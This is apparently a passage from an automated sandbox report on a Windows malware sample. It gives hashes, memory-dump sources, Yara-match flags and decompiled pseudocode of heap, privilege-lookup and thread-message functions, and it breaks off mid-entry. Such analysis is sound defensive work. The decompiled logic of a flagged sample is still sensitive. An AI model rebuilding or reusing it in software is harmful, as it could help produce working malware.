                                                      • Instruction ID: 921a64ea89de36c49262a815d819e6d34e5d7bd6a899092421972ec5554a1296
                                                      • Opcode Fuzzy Hash: 0b8723ce12dfbde2e3b0ccd94e5e0845fea0d7fd45c2d6b0f8eac143b621d2d7
                                                      • Instruction Fuzzy Hash: 7A90026160100052414075A98C459074009BBE22517D1C121A0998590DC9998C656AA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ca93b1a33cbf638fb2d89c57ae0216f283b8977c3a6d071d49cadc373a9454cb
                                                      • Instruction ID: d7b07f0568448c658fb5ed378aa4da39a63be4cf0a6c6d35a2f1cb517a343b79
                                                      • Opcode Fuzzy Hash: ca93b1a33cbf638fb2d89c57ae0216f283b8977c3a6d071d49cadc373a9454cb
                                                      • Instruction Fuzzy Hash: FA90027120140412D10065994C1570B0009A7D1342FD1C011A1164595DCA658C5179B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 15fb7ea36b2f69c49e8f7e96585263f7e97c15af30a33ccd3e31df9f2a3b56a2
                                                      • Instruction ID: 3cfe76637cbd29602921f6609cb13298067330ccc67fe3577c3341c4d96cd10b
                                                      • Opcode Fuzzy Hash: 15fb7ea36b2f69c49e8f7e96585263f7e97c15af30a33ccd3e31df9f2a3b56a2
                                                      • Instruction Fuzzy Hash: A5900265211000130105A9990B05507004AA7D63913D1C021F1015590CDA618C616561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8822fdad1f09637044eb84b9c372266859bac4c84930920ffca4c4b7b2dc6b99
                                                      • Instruction ID: cede864c6cd19e6adcb3ee1d7a6029f0d082dbc6a21b69fd4355fc9bc0ec4c71
                                                      • Opcode Fuzzy Hash: 8822fdad1f09637044eb84b9c372266859bac4c84930920ffca4c4b7b2dc6b99
                                                      • Instruction Fuzzy Hash: 8A9002A120200013410575994815617400EA7E1241BD1C021E10145D0DC9658C917565
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8004072c8f6c202de48d2b2a037aab9fd51599a9a0f4d087bb8d47ec4fa981b3
                                                      • Instruction ID: 9093b80709938eca26cb277a0d49fc50af06c57f7443a2721729e20c84839dbb
                                                      • Opcode Fuzzy Hash: 8004072c8f6c202de48d2b2a037aab9fd51599a9a0f4d087bb8d47ec4fa981b3
                                                      • Instruction Fuzzy Hash: 9490027120100412D10069D958096470009A7E1341FD1D011A5024595ECAA58C917571
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016997A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f553a8149b573a232151817421c6e2018ef07e91d07eac649ee94ba5c990e1b0
                                                      • Instruction ID: 7c667a369d21c1b6d34d0cf01e144a63dea4b6cf1dec688f2a7033fd922b59f9
                                                      • Opcode Fuzzy Hash: f553a8149b573a232151817421c6e2018ef07e91d07eac649ee94ba5c990e1b0
                                                      • Instruction Fuzzy Hash: 5690026130100013D140759958196074009F7E2341FD1D011E0414594CDD558C566662
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: fd50abf1d7e69f7f28fddbdc2c661c4cfe8e81dc3dd87690edea7877fd58805d
                                                      • Instruction ID: 4c911f0b882e72717f0d958af59da33ff92756bcd43c44d4761a8a1f2d2c2fe8
                                                      • Opcode Fuzzy Hash: fd50abf1d7e69f7f28fddbdc2c661c4cfe8e81dc3dd87690edea7877fd58805d
                                                      • Instruction Fuzzy Hash: 3E90026921300012D1807599580960B0009A7D2242FD1D415A0015598CCD558C696761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: df769ec08f50d5d665bc6e6fa9447a420ce3dcc0abb607ca095630d0b64b4c7d
                                                      • Instruction ID: e186fadb4fb0ddae935ea84742a04bd7b84436d7d316062dd793127b4bac6bdf
                                                      • Opcode Fuzzy Hash: df769ec08f50d5d665bc6e6fa9447a420ce3dcc0abb607ca095630d0b64b4c7d
                                                      • Instruction Fuzzy Hash: 4190027120100812D1807599480564B0009A7D2341FD1C015A0025694DCE558E597BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c8cde7b4bda9b6dad402abd0098c8a61ef5ba12e1e6137a32c9738223954b28f
                                                      • Instruction ID: 57f711476c45acda76b06f447315923c22bf648f717fd9538311994c3b4a5934
                                                      • Opcode Fuzzy Hash: c8cde7b4bda9b6dad402abd0098c8a61ef5ba12e1e6137a32c9738223954b28f
                                                      • Instruction Fuzzy Hash: C290027120108812D1106599880574B0009A7D1341FD5C411A4424698DCAD58C917561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E00409A90(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B810( &_v284, 0x104);
						E0041BE80( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                      0x00409a9b
                                                      0x00409aa3
                                                      0x00409aa5
                                                      0x00409aaa
                                                      0x00409aaf
                                                      0x00409ac2
                                                      0x00409ac7
                                                      0x00409ad0
                                                      0x00409adc
                                                      0x00409aef
                                                      0x00409af4
                                                      0x00409af7
                                                      0x00409b00
                                                      0x00409b12
                                                      0x00409b17
                                                      0x00409b1c
                                                      0x00000000
                                                      0x00000000
                                                      0x00409b1e
                                                      0x00409b22
                                                      0x00000000
                                                      0x00000000
                                                      0x00409b24
                                                      0x00000000
                                                      0x00409b22
                                                      0x00409b26
                                                      0x00409b29
                                                      0x00409b2f
                                                      0x00409b31
                                                      0x00409b3c
                                                      0x00409b41
                                                      0x00409b44
                                                      0x00409b51
                                                      0x00409b5c
                                                      0x00409b5e
                                                      0x00409b64
                                                      0x00409b68
                                                      0x00409b6b
                                                      0x00409b6b
                                                      0x00409b72
                                                      0x00409b75
                                                      0x00409b7a
                                                      0x00409b87
                                                      0x00409ab6
                                                      0x00409ab6
                                                      0x00409ab6

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                      • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                      • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                      • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A062, Relevance: 3.0, APIs: 2, Instructions: 48memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0041A062(signed int __ecx, void* __edx, void* __edi, long _a4, void* _a8) {
				void* _v0;
				intOrPtr _v4;
				char _t16;

				 *(__edx - 0x48) =  *(__edx - 0x48) | __ecx;
				asm("jecxz 0xffffffd2");
				asm("lodsd");
				_t13 = _v4;
				_push(_t25);
				_t6 = _t13 + 0xc74; // 0xc74
				E0041A960(__edi, _v4, _t6,  *((intOrPtr*)(_v4 + 0x10)), 0, 0x35);
				_t16 = RtlFreeHeap(_v0, _a4, _a8); // executed
				return _t16;
			}






                                                      0x0041a066
                                                      0x0041a069
                                                      0x0041a06b
                                                      0x0041a073
                                                      0x0041a079
                                                      0x0041a07f
                                                      0x0041a087
                                                      0x0041a09d
                                                      0x0041a0a1

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateFree
                                                      • String ID:
                                                      • API String ID: 2488874121-0
                                                      • Opcode ID: aa409ace8769739c721656b1954b57ba655222d83e4033bfb3458015cb861e3e
                                                      • Instruction ID: 9aec99f80d979829763f658558517c8ea97e6c987ab51b0632fcd2482d9baa97
                                                      • Opcode Fuzzy Hash: aa409ace8769739c721656b1954b57ba655222d83e4033bfb3458015cb861e3e
                                                      • Instruction Fuzzy Hash: BB01F2B92052446FD714DF24DC81DDB7BA8EF85314F15898DF84817302C230E854CBB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408373, Relevance: 1.7, APIs: 1, Instructions: 193threadwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E00408373(void* __eax, void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, int _a8, long _a12, int _a16) {
				int _v8;
				char _v64;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v684;
				char _v688;
				int __esi;
				void* __ebp;
				void* _t66;
				int _t67;
				void* _t76;
				long _t77;
				int _t81;
				void* _t83;

				_t76 = __edi - 1;
				_t89 = _t76;
				if(_t76 < 0) {
					E0041C400( &_v64, 3);
					_t66 = E0040ACD0(_t89, _a8 + 0x1c,  &_v64); // executed
					_t67 = E00414E20(_a8 + 0x1c, _t66, 0, 0, 0xc4e7b6d6);
					_t81 = _t67;
					if(_t81 != 0) {
						_push(_t76);
						_t77 = _a12;
						_t67 = PostThreadMessageW(_t77, 0x111, 0, 0); // executed
						_t91 = _t67;
						if(_t67 == 0) {
							_t67 =  *_t81(_t77, 0x8003, _t83 + (E0040A460(_t91, 1, 8) & 0x000000ff) - 0x40, _t67);
						}
					}
					return _t67;
				} else {
					__al = __al ^ 0x0000006f;
					_t7 = __ecx + 0x40;
					_t8 = __ebx;
					__ebx =  *_t7;
					 *_t7 = _t8;
					asm("arpl [ebp+0x5518c14c], sp");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v8 = 0;
					_v688 = 0;
					 &_v684 = E0041B860( &_v684, 0, 0x2a4);
					__esi = _a16;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a4;
					__eax = E004082F0(__eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041B150(__ecx);
					_t17 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t17;
					_a16 = 0;
					while(1) {
						__eax = E0040F640(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E00419F00(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L13:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L17;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L13;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L13;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0041B7E0(_a12,  &_v688, 0x2a8);
										L17:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E00419E90(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t37 = __esi + 0x2e8; // 0x2e8
											__eax = _t37;
											_push(__eax);
											 *__eax = _v136;
											__eax = _a12;
											_t39 = __esi + 0x314; // 0x314
											__ebx = _t39;
											_push(__ebx);
											__ecx = 0;
											_push( *(__esi + 0x2d0));
											__eax = _a12 + 0x220;
											_push(_a12 + 0x220);
											_push(__edi);
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E00419710();
											__ecx = 0;
											__esp = __esp + 0x14;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t47 = __esi + 0x2e0; // 0x2e0
												__eax = _t47;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *(__esi + 0x2e4) = _v132;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E00419750(__edi, _a12 + 0x224, 0x1a, __ebx, _t47);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E0041ADF0(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E0041BAD0( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t62 = __eax + 2; // 0x2
													__ecx = __eax + _t62;
													__eax =  &_v656;
													__eax = E00414A20(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						goto L21;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L21:
			}



















                                                      0x00408373
                                                      0x00408373
                                                      0x00408374
                                                      0x0040830e
                                                      0x0040831e
                                                      0x0040832e
                                                      0x00408333
                                                      0x0040833a
                                                      0x0040833c
                                                      0x0040833d
                                                      0x0040834a
                                                      0x0040834c
                                                      0x0040834e
                                                      0x0040836b
                                                      0x0040836b
                                                      0x0040836d
                                                      0x00408372
                                                      0x00408376
                                                      0x00408376
                                                      0x00408378
                                                      0x00408378
                                                      0x00408378
                                                      0x00408378
                                                      0x0040837b
                                                      0x00408380
                                                      0x00408381
                                                      0x00408383
                                                      0x00408389
                                                      0x0040838a
                                                      0x0040838b
                                                      0x0040838c
                                                      0x00408394
                                                      0x00408397
                                                      0x004083a4
                                                      0x004083a9
                                                      0x004083ac
                                                      0x004083b2
                                                      0x004083b7
                                                      0x004083bf
                                                      0x004083ca
                                                      0x004083ca
                                                      0x004083d1
                                                      0x004083e0
                                                      0x004083e6
                                                      0x004083eb
                                                      0x004083f8
                                                      0x00408402
                                                      0x0040840a
                                                      0x00408410
                                                      0x00408412
                                                      0x00000000
                                                      0x00000000
                                                      0x00408414
                                                      0x0040841c
                                                      0x00408436
                                                      0x00408436
                                                      0x00408439
                                                      0x0040843a
                                                      0x0040843d
                                                      0x00408440
                                                      0x00000000
                                                      0x00408442
                                                      0x00408442
                                                      0x00000000
                                                      0x00408442
                                                      0x0040841e
                                                      0x0040841e
                                                      0x00408425
                                                      0x00000000
                                                      0x00408427
                                                      0x00408427
                                                      0x0040842e
                                                      0x00000000
                                                      0x00408430
                                                      0x00408430
                                                      0x00408434
                                                      0x00408450
                                                      0x00408458
                                                      0x00408460
                                                      0x00408465
                                                      0x0040846d
                                                      0x0040846d
                                                      0x00408475
                                                      0x0040847d
                                                      0x0040847f
                                                      0x00000000
                                                      0x00408481
                                                      0x00408481
                                                      0x00408487
                                                      0x0040848a
                                                      0x00408490
                                                      0x00408493
                                                      0x00408499
                                                      0x00408499
                                                      0x0040849f
                                                      0x004084a0
                                                      0x004084a2
                                                      0x004084a5
                                                      0x004084a5
                                                      0x004084ab
                                                      0x004084ac
                                                      0x004084ae
                                                      0x004084af
                                                      0x004084b4
                                                      0x004084b5
                                                      0x004084b6
                                                      0x004084bc
                                                      0x004084c2
                                                      0x004084c8
                                                      0x004084ce
                                                      0x004084d4
                                                      0x004084da
                                                      0x004084df
                                                      0x004084e1
                                                      0x004084e4
                                                      0x004084ea
                                                      0x004084ec
                                                      0x00000000
                                                      0x004084f2
                                                      0x004084f2
                                                      0x004084f5
                                                      0x004084f5
                                                      0x004084fc
                                                      0x00408502
                                                      0x00408508
                                                      0x0040850e
                                                      0x00408514
                                                      0x00408520
                                                      0x00408528
                                                      0x0040852e
                                                      0x00408534
                                                      0x0040853e
                                                      0x00408546
                                                      0x0040854c
                                                      0x0040854e
                                                      0x00000000
                                                      0x00408554
                                                      0x00408554
                                                      0x0040855a
                                                      0x0040855a
                                                      0x00408560
                                                      0x0040856d
                                                      0x0040856f
                                                      0x00408573
                                                      0x00408578
                                                      0x0040857b
                                                      0x0040857b
                                                      0x0040858b
                                                      0x00408593
                                                      0x0040859b
                                                      0x0040859c
                                                      0x0040859d
                                                      0x0040859e
                                                      0x004085a0
                                                      0x004085a1
                                                      0x004085a1
                                                      0x0040854e
                                                      0x004084ec
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00408434
                                                      0x0040842e
                                                      0x00408425
                                                      0x00000000
                                                      0x0040841c
                                                      0x00408447
                                                      0x00408448
                                                      0x00408449
                                                      0x00408449
                                                      0x0040844b
                                                      0x0040844c
                                                      0x0040844e
                                                      0x0040844f
                                                      0x0040844f
                                                      0x00000000

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 6379131c9fd3f608ccd375e6e79506fe14cf2b7d6f13dcbbb1bff6ad43469b3b
                                                      • Instruction ID: dc6d07c72bb78a90db0061758641a327e1d61a1649643fe0ac9d2d05e9e25f21
                                                      • Opcode Fuzzy Hash: 6379131c9fd3f608ccd375e6e79506fe14cf2b7d6f13dcbbb1bff6ad43469b3b
                                                      • Instruction Fuzzy Hash: 1F61C570900309AFDB24DF64CC85FEB77A8EF44704F10446EF949A7281EB746941CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                      0x004082f0
                                                      0x004082ff
                                                      0x00408303
                                                      0x0040830e
                                                      0x0040831e
                                                      0x0040832e
                                                      0x00408333
                                                      0x0040833a
                                                      0x0040833d
                                                      0x0040834a
                                                      0x0040834c
                                                      0x0040834e
                                                      0x0040836b
                                                      0x0040836b
                                                      0x00000000
                                                      0x0040836d
                                                      0x00408372

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                      • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                      • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                      • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                      0x0041a07f
                                                      0x0041a087
                                                      0x0041a09d
                                                      0x0041a0a1

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                      0x0041a047
                                                      0x0041a05d
                                                      0x0041a061

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                      0x0041a1ea
                                                      0x0041a200
                                                      0x0041a204

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                      Memory Dump Source
